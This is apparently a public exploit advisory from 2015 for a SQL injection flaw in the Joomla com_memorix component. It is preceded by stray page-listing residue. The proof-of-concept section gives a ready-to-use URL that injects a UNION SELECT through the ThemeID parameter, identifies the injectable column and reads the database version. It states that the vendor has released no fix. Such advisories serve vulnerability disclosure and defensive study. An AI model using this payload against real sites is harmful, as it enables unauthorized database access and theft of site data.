27 lines
No EOL
891 B
Text
27 lines
No EOL
891 B
Text
# Exploit Title: Joomla com_memorix component SQL Injection vulnerability
|
|
# Date: 13-08-2015
|
|
# Software Link: N/A
|
|
# Exploit Author: Omar AbuHassan
|
|
# Contact: https://www.linkedin.com/pub/omar-abu-hassan/bb/600/960
|
|
# CVE: N/A
|
|
# Category: webapps
|
|
# Version: All
|
|
# Tested on: Kali linux (x64) / Windows 8.1 pro (x64)
|
|
|
|
1. Description
|
|
|
|
Normal user can inject sql query in the url which lead to read data from the database.
|
|
|
|
2. Proof of Concept
|
|
|
|
http://www.example.com/index.php?option=com_memorix&task=result&searchplugin=theme&Itemid=60&ThemeID=-8594 (SQLI)
|
|
|
|
Injected column is # 3
|
|
|
|
http://www.example.com/index.php?option=com_memorix&task=result&searchplugin=theme&Itemid=60&ThemeID=-8594+union+select+111,222,version(),444,555,666,777,888,999--+AbuHassan
|
|
|
|
** No solution yet from vendor **
|
|
|
|
#######################
|
|
# Greets to Palestine #
|
|
####################### |